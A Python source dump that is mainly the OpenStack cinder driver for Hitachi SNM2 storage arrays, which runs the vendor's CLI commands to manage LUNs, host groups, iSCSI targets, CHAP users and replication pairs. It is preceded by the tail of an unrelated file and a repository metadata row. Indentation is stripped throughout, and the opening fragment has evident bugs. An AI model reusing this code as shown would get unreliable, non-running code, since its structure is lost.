'IDT_SBL5' : 'SBL5' ,
'IDT_SBL6' : 'SBL6' ,
'IDT_SBL7' : 'SBL7' ,
'IDT_SBL8' : 'SBL8' ,
'IDT_VTA' : 'VTA' ,
'IDT_VTB' : 'VTB' ,
'IDT_VTC' : 'VTC' ,
'IDT_VIA' : 'VIA' ,
'IDT_VIB' : 'VIB' ,
'IDT_VIC' : 'VIC' ,
}
class messag ():
def getSystimeS(self):
return time.strftime("%y%m%d%H%M%S")
def getSystime(self):
return time.strftime("%y%m%d%H%M")
def sendRtuArgTable(self, data, Len):
print(str(data))
print(stu.get('IDT_VIC'))
def initRtu(self):
self.sendRtuArgTable(self,'nihao' , 5)
| gpl-3.0 |
tobegit3hub/cinder_docker | cinder/volume/drivers/hitachi/hbsd_snm2.py | 29 | 43676 | # Copyright (C) 2014, Hitachi, Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import re
import shlex
import threading
import time
from oslo_log import log as logging
from oslo_service import loopingcall
from oslo_utils import excutils
from oslo_utils import units
import six
from cinder import exception
from cinder.i18n import _LE, _LW
from cinder import utils
from cinder.volume.drivers.hitachi import hbsd_basiclib as basic_lib
LOG = logging.getLogger(__name__)
SNM2_ENV = ('LANG=C STONAVM_HOME=/usr/stonavm '
'LD_LIBRARY_PATH=/usr/stonavm/lib '
'STONAVM_RSP_PASS=on STONAVM_ACT=on')
MAX_HOSTGROUPS = 127
MAX_HOSTGROUPS_ISCSI = 254
MAX_HLUN = 2047
EXEC_LOCK_PATH_BASE = basic_lib.LOCK_DIR + 'hsnm_'
EXEC_TIMEOUT = 10
EXEC_INTERVAL = 1
CHAP_TIMEOUT = 5
PAIRED = 12
DUMMY_LU = -1
class HBSDSNM2(basic_lib.HBSDBasicLib):
def __init__(self, conf):
super(HBSDSNM2, self).__init__(conf=conf)
self.unit_name = conf.hitachi_unit_name
self.hsnm_lock = threading.Lock()
self.hsnm_lock_file = ('%s%s'
% (EXEC_LOCK_PATH_BASE, self.unit_name))
copy_speed = conf.hitachi_copy_speed
if copy_speed <= 2:
self.pace = 'slow'
elif copy_speed == 3:
self.pace = 'normal'
else:
self.pace = 'prior'
def _wait_for_exec_hsnm(self, args, printflag, noretry, timeout, start):
lock = basic_lib.get_process_lock(self.hsnm_lock_file)
with self.hsnm_lock, lock:
ret, stdout, stderr = self.exec_command('env', args=args,
printflag=printflag)
if not ret or noretry:
raise loopingcall.LoopingCallDone((ret, stdout, stderr))
if time.time() - start >= timeout:
LOG.error(_LE("snm2 command timeout."))
raise loopingcall.LoopingCallDone((ret, stdout, stderr))
if (re.search('DMEC002047', stderr)
or re.search('DMEC002048', stderr)
or re.search('DMED09000A', stderr)
or re.search('DMED090026', stderr)
or re.search('DMED0E002B', stderr)
or re.search('DMER03006A', stderr)
or re.search('DMER030080', stderr)
or re.search('DMER0300B8', stderr)
or re.search('DMER0800CF', stderr)
or re.search('DMER0800D[0-6D]', stderr)
or re.search('DMES052602', stderr)):
LOG.error(_LE("Unexpected error occurs in snm2."))
raise loopingcall.LoopingCallDone((ret, stdout, stderr))
def exec_hsnm(self, command, args, printflag=True, noretry=False,
timeout=EXEC_TIMEOUT, interval=EXEC_INTERVAL):
args = '%s %s %s' % (SNM2_ENV, command, args)
loop = loopingcall.FixedIntervalLoopingCall(
self._wait_for_exec_hsnm, args, printflag,
noretry, timeout, time.time())
return loop.start(interval=interval).wait()
def _execute_with_exception(self, cmd, args, **kwargs):
ret, stdout, stderr = self.exec_hsnm(cmd, args, **kwargs)
if ret:
cmds = '%(cmd)s %(args)s' % {'cmd': cmd, 'args': args}
msg = basic_lib.output_err(
600, cmd=cmds, ret=ret, out=stdout, err=stderr)
raise exception.HBSDError(data=msg)
return ret, stdout, stderr
def _execute_and_return_stdout(self, cmd, args, **kwargs):
result = self._execute_with_exception(cmd, args, **kwargs)
return result[1]
def get_comm_version(self):
ret, stdout, stderr = self.exec_hsnm('auman', '-help')
m = re.search('Version (\d+).(\d+)', stdout)
if not m:
msg = basic_lib.output_err(
600, cmd='auman', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
return '%s.%s' % (m.group(1), m.group(2))
def add_used_hlun(self, command, port, gid, used_list, ldev):
unit = self.unit_name
ret, stdout, stderr = self.exec_hsnm(command,
'-unit %s -refer' % unit)
if ret:
msg = basic_lib.output_err(
600, cmd=command, ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
lines = stdout.splitlines()
for line in lines[2:]:
line = shlex.split(line)
if not line:
continue
if line[0] == port and int(line[1][0:3]) == gid:
if int(line[2]) not in used_list:
used_list.append(int(line[2]))
if int(line[3]) == ldev:
hlu = int(line[2])
LOG.warning(_LW('ldev(%(ldev)d) is already mapped '
'(hlun: %(hlu)d)'),
{'ldev': ldev, 'hlu': hlu})
return hlu
return None
def _get_lu(self, lu=None):
# When 'lu' is 0, it should be true. So, it cannot remove 'is None'.
if lu is None:
args = '-unit %s' % self.unit_name
else:
args = '-unit %s -lu %s' % (self.unit_name, lu)
return self._execute_and_return_stdout('auluref', args)
def get_unused_ldev(self, ldev_range):
start = ldev_range[0]
end = ldev_range[1]
unit = self.unit_name
ret, stdout, stderr = self.exec_hsnm('auluref', '-unit %s' % unit)
if ret:
msg = basic_lib.output_err(
600, cmd='auluref', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
free_ldev = start
lines = stdout.splitlines()
found = False
for line in lines[2:]:
line = shlex.split(line)
if not line:
continue
ldev_num = int(line[0])
if free_ldev > ldev_num:
continue
if free_ldev == ldev_num:
free_ldev += 1
else:
found = True
break
if free_ldev > end:
break
else:
found = True
if not found:
msg = basic_lib.output_err(648, resource='LDEV')
raise exception.HBSDError(message=msg)
return free_ldev
def get_hgname_gid(self, port, host_grp_name):
unit = self.unit_name
ret, stdout, stderr = self.exec_hsnm('auhgdef',
'-unit %s -refer' % unit)
if ret:
msg = basic_lib.output_err(
600, cmd='auhgdef', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
lines = stdout.splitlines()
is_target_port = False
for line in lines:
line = shlex.split(line)
if not line:
continue
if line[0] == 'Port' and line[1] == port:
is_target_port = True
continue
if is_target_port:
if line[0] == 'Port':
break
if not line[0].isdigit():
continue
gid = int(line[0])
if line[1] == host_grp_name:
return gid
return None
def get_unused_gid(self, group_range, port):
start = group_range[0]
end = group_range[1]
unit = self.unit_name
ret, stdout, stderr = self.exec_hsnm('auhgdef',
'-unit %s -refer' % unit)
if ret:
msg = basic_lib.output_err(
600, cmd='auhgdef', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
lines = stdout.splitlines()
is_target_port = False
free_gid = start
found = False
for line in lines:
line = shlex.split(line)
if not line:
continue
if line[0] == 'Port' and line[1] == port:
is_target_port = True
continue
if is_target_port:
if line[0] == 'Port':
found = True
break
if not line[0].isdigit():
continue
gid = int(line[0])
if free_gid > gid:
continue
if free_gid == gid:
free_gid += 1
else:
found = True
break
if free_gid > end or free_gid > MAX_HOSTGROUPS:
break
else:
found = True
if not found:
msg = basic_lib.output_err(648, resource='GID')
raise exception.HBSDError(message=msg)
return free_gid
def comm_set_target_wwns(self, target_ports):
unit = self.unit_name
ret, stdout, stderr = self.exec_hsnm('aufibre1',
'-unit %s -refer' % unit)
if ret:
msg = basic_lib.output_err(
600, cmd='aufibre1', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
lines = stdout.splitlines()
target_wwns = {}
for line in lines[3:]:
if re.match('Transfer', line):
break
line = shlex.split(line)
if len(line) < 4:
continue
port = '%s%s' % (line[0], line[1])
if target_ports:
if port in target_ports:
target_wwns[port] = line[3]
else:
target_wwns[port] = line[3]
LOG.debug('target wwns: %s', target_wwns)
return target_wwns
def get_hostgroup_from_wwns(self, hostgroups, port, wwns, buf, login):
for pt in wwns:
for line in buf[port]['assigned']:
hgname = shlex.split(line[38:])[1][4:]
if not re.match(basic_lib.NAME_PREFIX, hgname):
continue
if pt.search(line[38:54]):
wwn = line[38:54]
gid = int(shlex.split(line[38:])[1][0:3])
is_detected = None
if login:
for line in buf[port]['detected']:
if pt.search(line[38:54]):
is_detected = True
break
else:
is_detected = False
hostgroups.append({'port': six.text_type(port), 'gid': gid,
'initiator_wwn': wwn,
'detected': is_detected})
def comm_get_hostgroup_info(self, hgs, wwns, target_ports, login=True):
unit = self.unit_name
ret, stdout, stderr = self.exec_hsnm('auhgwwn',
'-unit %s -refer' % unit)
if ret:
msg = basic_lib.output_err(
600, cmd='auhgwwn', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
security_ports = []
patterns = []
for wwn in wwns:
pt = re.compile(wwn, re.IGNORECASE)
patterns.append(pt)
lines = stdout.splitlines()
buf = {}
_buffer = []
port = None
security = None
for line in lines:
if re.match('Port', line):
port = shlex.split(line)[1]
if target_ports and port not in target_ports:
port = None
else:
security = True if shlex.split(line)[5] == 'ON' else False
buf[port] = {'detected': [], 'assigned': [],
'assignable': []}
if security:
security_ports.append(port)
continue
if port and security:
if re.search('Detected WWN', line):
_buffer = buf[port]['detected']
continue
elif re.search('Assigned WWN', line):
_buffer = buf[port]['assigned']
continue
elif re.search('Assignable WWN', line):
_buffer = buf[port]['assignable']
continue
_buffer.append(line)
hostgroups = []
for port in buf.keys():
self.get_hostgroup_from_wwns(
hostgroups, port, patterns, buf, login)
for hostgroup in hostgroups:
hgs.append(hostgroup)
return security_ports
def comm_delete_lun_core(self, command, hostgroups, lun):
unit = self.unit_name
no_lun_cnt = 0
deleted_hostgroups = []
for hostgroup in hostgroups:
LOG.debug('comm_delete_lun: hostgroup is %s', hostgroup)
port = hostgroup['port']
gid = hostgroup['gid']
ctl_no = port[0]
port_no = port[1]
is_deleted = False
for deleted in deleted_hostgroups:
if port == deleted['port'] and gid == deleted['gid']:
is_deleted = True
if is_deleted:
continue
ret, stdout, stderr = self.exec_hsnm(command,
'-unit %s -refer' % unit)
if ret:
msg = basic_lib.output_err(
600, cmd=command, ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
lines = stdout.splitlines()
for line in lines[2:]:
line = shlex.split(line)
if not line:
continue
if (line[0] == port and int(line[1][0:3]) == gid
and int(line[3]) == lun):
hlu = int(line[2])
break
else:
no_lun_cnt += 1
if no_lun_cnt == len(hostgroups):
raise exception.HBSDNotFound
else:
continue
opt = '-unit %s -rm %s %s %d %d %d' % (unit, ctl_no, port_no,
gid, hlu, lun)
ret, stdout, stderr = self.exec_hsnm(command, opt)
if ret:
msg = basic_lib.output_err(
600, cmd=command, ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
deleted_hostgroups.append({'port': port, 'gid': gid})
LOG.debug('comm_delete_lun is over (%d)', lun)
def comm_delete_lun(self, hostgroups, ldev):
self.comm_delete_lun_core('auhgmap', hostgroups, ldev)
def comm_delete_lun_iscsi(self, hostgroups, ldev):
self.comm_delete_lun_core('autargetmap', hostgroups, ldev)
def comm_add_ldev(self, pool_id, ldev, capacity, is_vvol):
unit = self.unit_name
if is_vvol:
command = 'aureplicationvvol'
opt = ('-unit %s -add -lu %d -size %dg'
% (unit, ldev, capacity))
else:
command = 'auluadd'
opt = ('-unit %s -lu %d -dppoolno %d -size %dg'
% (unit, ldev, pool_id, capacity))
ret, stdout, stderr = self.exec_hsnm(command, opt)
if ret:
if (re.search('DMEC002047', stderr)
or re.search('DMES052602', stderr)
or re.search('DMED09000A', stderr)):
raise exception.HBSDNotFound
else:
msg = basic_lib.output_err(
600, cmd=command, ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
def comm_add_hostgrp(self, port, gid, host_grp_name):
unit = self.unit_name
ctl_no = port[0]
port_no = port[1]
opt = '-unit %s -add %s %s -gno %d -gname %s' % (unit, ctl_no,
port_no, gid,
host_grp_name)
ret, stdout, stderr = self.exec_hsnm('auhgdef', opt)
if ret:
raise exception.HBSDNotFound
def comm_del_hostgrp(self, port, gid, host_grp_name):
unit = self.unit_name
ctl_no = port[0]
port_no = port[1]
opt = '-unit %s -rm %s %s -gname %s' % (unit, ctl_no, port_no,
host_grp_name)
ret, stdout, stderr = self.exec_hsnm('auhgdef', opt)
if ret:
msg = basic_lib.output_err(
600, cmd='auhgdef', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
def comm_add_hbawwn(self, port, gid, wwn):
unit = self.unit_name
ctl_no = port[0]
port_no = port[1]
opt = '-unit %s -set -permhg %s %s %s -gno %d' % (unit, ctl_no,
port_no, wwn, gid)
ret, stdout, stderr = self.exec_hsnm('auhgwwn', opt)
if ret:
opt = '-unit %s -assign -permhg %s %s %s -gno %d' % (unit, ctl_no,
port_no, wwn,
gid)
ret, stdout, stderr = self.exec_hsnm('auhgwwn', opt)
if ret:
msg = basic_lib.output_err(
600, cmd='auhgwwn', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
def comm_add_lun(self, command, hostgroups, ldev, is_once=False):
unit = self.unit_name
tmp_hostgroups = hostgroups[:]
used_list = []
is_ok = False
hlu = None
old_hlu = None
for hostgroup in hostgroups:
port = hostgroup['port']
gid = hostgroup['gid']
hlu = self.add_used_hlun(command, port, gid, used_list, ldev)
# When 'hlu' or 'old_hlu' is 0, it should be true.
# So, it cannot remove 'is not None'.
if hlu is not None:
if old_hlu is not None and old_hlu != hlu:
msg = basic_lib.output_err(648, resource='LUN (HLUN)')
raise exception.HBSDError(message=msg)
is_ok = True
hostgroup['lun'] = hlu
tmp_hostgroups.remove(hostgroup)
old_hlu = hlu
else:
hlu = old_hlu
if not used_list:
hlu = 0
elif hlu is None:
for i in range(MAX_HLUN + 1):
if i not in used_list:
hlu = i
break
else:
raise exception.HBSDNotFound
ret = 0
stdout = None
stderr = None
invalid_hgs_str = None
for hostgroup in tmp_hostgroups:
port = hostgroup['port']
gid = hostgroup['gid']
ctl_no = port[0]
port_no = port[1]
if not hostgroup['detected']:
if invalid_hgs_str:
invalid_hgs_str = '%s, %s:%d' % (invalid_hgs_str,
port, gid)
else:
invalid_hgs_str = '%s:%d' % (port, gid)
continue
opt = '-unit %s -add %s %s %d %d %d' % (unit, ctl_no, port_no,
gid, hlu, ldev)
ret, stdout, stderr = self.exec_hsnm(command, opt)
if ret == 0:
is_ok = True
hostgroup['lun'] = hlu
if is_once:
break
else:
LOG.warning(basic_lib.set_msg(
314, ldev=ldev, lun=hlu, port=port, id=gid))
if not is_ok:
if stderr:
msg = basic_lib.output_err(
600, cmd=command, ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
else:
msg = basic_lib.output_err(659, gid=invalid_hgs_str)
raise exception.HBSDError(message=msg)
def comm_delete_ldev(self, ldev, is_vvol):
unit = self.unit_name
if is_vvol:
command = 'aureplicationvvol'
opt = '-unit %s -rm -lu %d' % (unit, ldev)
else:
command = 'auludel'
opt = '-unit %s -lu %d -f' % (unit, ldev)
ret, stdout, stderr = self.exec_hsnm(command, opt,
timeout=30, interval=3)
if ret:
if (re.search('DMEC002048', stderr)
or re.search('DMED090026', stderr)):
raise exception.HBSDNotFound
msg = basic_lib.output_err(
600, cmd=command, ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
return ret
def comm_extend_ldev(self, ldev, old_size, new_size):
unit = self.unit_name
command = 'auluchgsize'
options = '-unit %s -lu %d -size %dg' % (unit, ldev, new_size)
ret, stdout, stderr = self.exec_hsnm(command, options)
if ret:
msg = basic_lib.output_err(
600, cmd=command, ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
def delete_chap_user(self, port):
unit = self.unit_name
ctl_no = port[0]
port_no = port[1]
auth_username = self.conf.hitachi_auth_user
opt = '-unit %s -rm %s %s -user %s' % (unit, ctl_no, port_no,
auth_username)
return self.exec_hsnm('auchapuser', opt)
def _wait_for_add_chap_user(self, cmd, auth_username,
auth_password, start):
# Don't move 'import pexpect' to the beginning of the file so that
# a tempest can work.
import pexpect
lock = basic_lib.get_process_lock(self.hsnm_lock_file)
with self.hsnm_lock, lock:
try:
child = pexpect.spawn(cmd)
child.expect('Secret: ', timeout=CHAP_TIMEOUT)
child.sendline(auth_password)
child.expect('Re-enter Secret: ',
timeout=CHAP_TIMEOUT)
child.sendline(auth_password)
child.expect('The CHAP user information has '
'been added successfully.',
timeout=CHAP_TIMEOUT)
except Exception:
if time.time() - start >= EXEC_TIMEOUT:
msg = basic_lib.output_err(642, user=auth_username)
raise exception.HBSDError(message=msg)
else:
raise loopingcall.LoopingCallDone(True)
def set_chap_authention(self, port, gid):
ctl_no = port[0]
port_no = port[1]
unit = self.unit_name
auth_username = self.conf.hitachi_auth_user
auth_password = self.conf.hitachi_auth_password
add_chap_user = self.conf.hitachi_add_chap_user
assign_flag = True
added_flag = False
opt = '-unit %s -refer %s %s -user %s' % (unit, ctl_no, port_no,
auth_username)
ret, stdout, stderr = self.exec_hsnm('auchapuser', opt, noretry=True)
if ret:
if not add_chap_user:
msg = basic_lib.output_err(643, user=auth_username)
raise exception.HBSDError(message=msg)
root_helper = utils.get_root_helper()
cmd = ('%s env %s auchapuser -unit %s -add %s %s '
'-tno %d -user %s' % (root_helper, SNM2_ENV, unit, ctl_no,
port_no, gid, auth_username))
LOG.debug('Add CHAP user')
loop = loopingcall.FixedIntervalLoopingCall(
self._wait_for_add_chap_user, cmd,
auth_username, auth_password, time.time())
added_flag = loop.start(interval=EXEC_INTERVAL).wait()
else:
lines = stdout.splitlines()[4:]
for line in lines:
if int(shlex.split(line)[0][0:3]) == gid:
assign_flag = False
break
if assign_flag:
opt = '-unit %s -assign %s %s -tno %d -user %s' % (unit, ctl_no,
port_no, gid,
auth_username)
ret, stdout, stderr = self.exec_hsnm('auchapuser', opt)
if ret:
if added_flag:
_ret, _stdout, _stderr = self.delete_chap_user(port)
if _ret:
LOG.warning(basic_lib.set_msg(
303, user=auth_username))
msg = basic_lib.output_err(
600, cmd='auchapuser', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
return added_flag
def comm_add_hostgrp_iscsi(self, port, gid, target_alias, target_iqn):
auth_method = self.conf.hitachi_auth_method
unit = self.unit_name
ctl_no = port[0]
port_no = port[1]
if auth_method:
auth_arg = '-authmethod %s -mutual disable' % auth_method
else:
auth_arg = '-authmethod None'
opt = '-unit %s -add %s %s -tno %d' % (unit, ctl_no, port_no, gid)
opt = '%s -talias %s -iname %s %s' % (opt, target_alias, target_iqn,
auth_arg)
ret, stdout, stderr = self.exec_hsnm('autargetdef', opt)
if ret:
raise exception.HBSDNotFound
def delete_iscsi_target(self, port, _target_no, target_alias):
unit = self.unit_name
ctl_no = port[0]
port_no = port[1]
opt = '-unit %s -rm %s %s -talias %s' % (unit, ctl_no, port_no,
target_alias)
return self.exec_hsnm('autargetdef', opt)
def comm_set_hostgrp_reportportal(self, port, target_alias):
unit = self.unit_name
ctl_no = port[0]
port_no = port[1]
opt = '-unit %s -set %s %s -talias %s' % (unit, ctl_no, port_no,
target_alias)
opt = '%s -ReportFullPortalList enable' % opt
ret, stdout, stderr = self.exec_hsnm('autargetopt', opt)
if ret:
msg = basic_lib.output_err(
600, cmd='autargetopt', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
def comm_add_initiator(self, port, gid, host_iqn):
unit = self.unit_name
ctl_no = port[0]
port_no = port[1]
opt = '-unit %s -add %s %s -tno %d -iname %s' % (unit, ctl_no,
port_no, gid,
host_iqn)
ret, stdout, stderr = self.exec_hsnm('autargetini', opt)
if ret:
msg = basic_lib.output_err(
600, cmd='autargetini', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
def comm_get_hostgroup_info_iscsi(self, hgs, host_iqn, target_ports):
unit = self.unit_name
ret, stdout, stderr = self.exec_hsnm('autargetini',
'-unit %s -refer' % unit)
if ret:
msg = basic_lib.output_err(
600, cmd='autargetini', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
security_ports = []
lines = stdout.splitlines()
hostgroups = []
security = True
for line in lines:
if not shlex.split(line):
continue
if re.match('Port', line):
line = shlex.split(line)
port = line[1]
security = True if line[4] == 'ON' else False
continue
if target_ports and port not in target_ports:
continue
if security:
if (host_iqn in shlex.split(line[72:]) and
re.match(basic_lib.NAME_PREFIX,
shlex.split(line)[0][4:])):
gid = int(shlex.split(line)[0][0:3])
hostgroups.append(
{'port': port, 'gid': gid, 'detected': True})
LOG.debug('Find port=%(port)s gid=%(gid)d',
{'port': port, 'gid': gid})
if port not in security_ports:
security_ports.append(port)
for hostgroup in hostgroups:
hgs.append(hostgroup)
return security_ports
def comm_get_iscsi_ip(self, port):
unit = self.unit_name
ret, stdout, stderr = self.exec_hsnm('auiscsi',
'-unit %s -refer' % unit)
if ret:
msg = basic_lib.output_err(
600, cmd='auiscsi', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
lines = stdout.splitlines()
is_target_port = False
for line in lines:
line_array = shlex.split(line)
if not line_array:
continue
if line_array[0] == 'Port' and line_array[1] != 'Number':
if line_array[1] == port:
is_target_port = True
else:
is_target_port = False
continue
if is_target_port and re.search('IPv4 Address', line):
ip_addr = shlex.split(line)[3]
break
if is_target_port and re.search('Port Number', line):
ip_port = shlex.split(line)[3]
else:
msg = basic_lib.output_err(651)
raise exception.HBSDError(message=msg)
return ip_addr, ip_port
def comm_get_target_iqn(self, port, gid):
unit = self.unit_name
ret, stdout, stderr = self.exec_hsnm('autargetdef',
'-unit %s -refer' % unit)
if ret:
msg = basic_lib.output_err(
600, cmd='autargetdef', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
is_target_host = False
tmp_port = None
lines = stdout.splitlines()
for line in lines:
line = shlex.split(line)
if not line:
continue
if line[0] == "Port":
tmp_port = line[1]
continue
if port != tmp_port:
continue
gid_tmp = line[0][0:3]
if gid_tmp.isdigit() and int(gid_tmp) == gid:
is_target_host = True
continue
if is_target_host and line[0] == "iSCSI":
target_iqn = line[3]
break
else:
msg = basic_lib.output_err(650, resource='IQN')
raise exception.HBSDError(message=msg)
return target_iqn
def get_unused_gid_iscsi(self, group_range, port):
start = group_range[0]
end = min(group_range[1], MAX_HOSTGROUPS_ISCSI)
unit = self.unit_name
ret, stdout, stderr = self.exec_hsnm('autargetdef',
'-unit %s -refer' % unit)
if ret:
msg = basic_lib.output_err(
600, cmd='autargetdef', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
used_list = []
tmp_port = None
lines = stdout.splitlines()
for line in lines:
line = shlex.split(line)
if not line:
continue
if line[0] == "Port":
tmp_port = line[1]
continue
if port != tmp_port:
continue
if line[0][0:3].isdigit():
gid = int(line[0][0:3])
if start <= gid <= end:
used_list.append(gid)
if not used_list:
return start
for gid in range(start, end + 1):
if gid not in used_list:
break
else:
msg = basic_lib.output_err(648, resource='GID')
raise exception.HBSDError(message=msg)
return gid
def get_gid_from_targetiqn(self, target_iqn, target_alias, port):
unit = self.unit_name
ret, stdout, stderr = self.exec_hsnm('autargetdef',
'-unit %s -refer' % unit)
if ret:
msg = basic_lib.output_err(
600, cmd='autargetdef', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
gid = None
tmp_port = None
found_alias_full = False
found_alias_part = False
lines = stdout.splitlines()
for line in lines:
line = shlex.split(line)
if not line:
continue
if line[0] == "Port":
tmp_port = line[1]
continue
if port != tmp_port:
continue
if line[0][0:3].isdigit():
tmp_gid = int(line[0][0:3])
if re.match(basic_lib.NAME_PREFIX, line[0][4:]):
found_alias_part = True
if line[0][4:] == target_alias:
found_alias_full = True
continue
if line[0] == "iSCSI":
if line[3] == target_iqn:
gid = tmp_gid
break
else:
found_alias_part = False
if found_alias_full and gid is None:
msg = basic_lib.output_err(641)
raise exception.HBSDError(message=msg)
# When 'gid' is 0, it should be true.
# So, it cannot remove 'is not None'.
if not found_alias_part and gid is not None:
msg = basic_lib.output_err(641)
raise exception.HBSDError(message=msg)
return gid
def comm_get_dp_pool(self, pool_id):
unit = self.unit_name
ret, stdout, stderr = self.exec_hsnm('audppool',
'-unit %s -refer -g' % unit,
printflag=False)
if ret:
msg = basic_lib.output_err(
600, cmd='audppool', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
lines = stdout.splitlines()
for line in lines[2:]:
tc_cc = re.search('\s(\d+\.\d) GB\s+(\d+\.\d) GB\s', line)
pool_tmp = re.match('\s*\d+', line)
if (pool_tmp and tc_cc
and int(pool_tmp.group(0)) == pool_id):
total_gb = int(float(tc_cc.group(1)))
free_gb = total_gb - int(float(tc_cc.group(2)))
return total_gb, free_gb
msg = basic_lib.output_err(640, pool_id=pool_id)
raise exception.HBSDError(message=msg)
def is_detected(self, port, wwn):
hgs = []
self.comm_get_hostgroup_info(hgs, [wwn], [port], login=True)
return hgs[0]['detected']
def pairoperate(self, opr, pvol, svol, is_vvol, args=None):
unit = self.unit_name
method = '-ss' if is_vvol else '-si'
opt = '-unit %s -%s %s -pvol %d -svol %d' % (unit, opr, method,
pvol, svol)
if args:
opt = '%s %s' % (opt, args)
ret, stdout, stderr = self.exec_hsnm('aureplicationlocal', opt)
if ret:
opt = '%s %s' % ('aureplicationlocal', opt)
msg = basic_lib.output_err(
600, cmd=opt, ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
def comm_create_pair(self, pvol, svol, is_vvol):
if not is_vvol:
args = '-compsplit -pace %s' % self.pace
method = basic_lib.FULL
else:
pool = self.conf.hitachi_thin_pool_id
args = ('-localrepdppoolno %d -localmngdppoolno %d '
'-compsplit -pace %s' % (pool, pool, self.pace))
method = basic_lib.THIN
try:
self.pairoperate('create', pvol, svol, is_vvol, args=args)
except exception.HBSDCmdError as ex:
if (re.search('DMER0300B8', ex.stderr)
or re.search('DMER0800CF', ex.stderr)
or re.search('DMER0800D[0-6D]', ex.stderr)
or re.search('DMER03006A', ex.stderr)
or re.search('DMER030080', ex.stderr)):
msg = basic_lib.output_err(615, copy_method=method, pvol=pvol)
raise exception.HBSDBusy(message=msg)
else:
raise
def _comm_pairevtwait(self, pvol, svol, is_vvol):
unit = self.unit_name
if not is_vvol:
pairname = 'SI_LU%04d_LU%04d' % (pvol, svol)
method = '-si'
else:
pairname = 'SS_LU%04d_LU%04d' % (pvol, svol)
method = '-ss'
opt = ('-unit %s -evwait %s -pairname %s -gname Ungrouped -nowait' %
(unit, method, pairname))
ret, stdout, stderr = self.exec_hsnm('aureplicationmon',
opt, noretry=True)
return ret
def _wait_for_pair_status(self, pvol, svol, is_vvol,
status, timeout, start):
if self._comm_pairevtwait(pvol, svol, is_vvol) in status:
raise loopingcall.LoopingCallDone()
if time.time() - start >= timeout:
msg = basic_lib.output_err(
637, method='_wait_for_pair_status', timeout=timeout)
raise exception.HBSDError(message=msg)
def comm_pairevtwait(self, pvol, svol, is_vvol, status, timeout, interval):
loop = loopingcall.FixedIntervalLoopingCall(
self._wait_for_pair_status, pvol, svol, is_vvol,
status, timeout, time.time())
loop.start(interval=interval).wait()
def delete_pair(self, pvol, svol, is_vvol):
self.pairoperate('simplex', pvol, svol, is_vvol)
def trans_status_hsnm2raid(self, str):
status = None
obj = re.search('Split\((.*)%\)', str)
if obj:
status = basic_lib.PSUS
obj = re.search('Paired\((.*)%\)', str)
if obj:
status = basic_lib.PAIR
return status
def get_paired_info(self, ldev, only_flag=False):
opt_base = '-unit %s -refer' % self.unit_name
if only_flag:
opt_base = '%s -ss' % opt_base
opt = '%s -pvol %d' % (opt_base, ldev)
ret, stdout, stderr = self.exec_hsnm('aureplicationlocal',
opt, noretry=True)
if ret == 0:
lines = stdout.splitlines()
pair_info = {'pvol': ldev, 'svol': []}
for line in lines[1:]:
status = self.trans_status_hsnm2raid(line)
if re.search('SnapShot', line[100:]):
is_vvol = True
else:
is_vvol = False
line = shlex.split(line)
if not line:
break
svol = int(line[2])
pair_info['svol'].append({'lun': svol,
'status': status,
'is_vvol': is_vvol})
return pair_info
opt = '%s -svol %d' % (opt_base, ldev)
ret, stdout, stderr = self.exec_hsnm('aureplicationlocal',
opt, noretry=True)
if ret == 1:
return {'pvol': None, 'svol': []}
lines = stdout.splitlines()
status = self.trans_status_hsnm2raid(lines[1])
if re.search('SnapShot', lines[1][100:]):
is_vvol = True
else:
is_vvol = False
line = shlex.split(lines[1])
pvol = int(line[1])
return {'pvol': pvol, 'svol': [{'lun': ldev,
'status': status,
'is_vvol': is_vvol}]}
def create_lock_file(self):
basic_lib.create_empty_file(self.hsnm_lock_file)
def get_hostgroup_luns(self, port, gid):
list = []
self.add_used_hlun('auhgmap', port, gid, list, DUMMY_LU)
return list
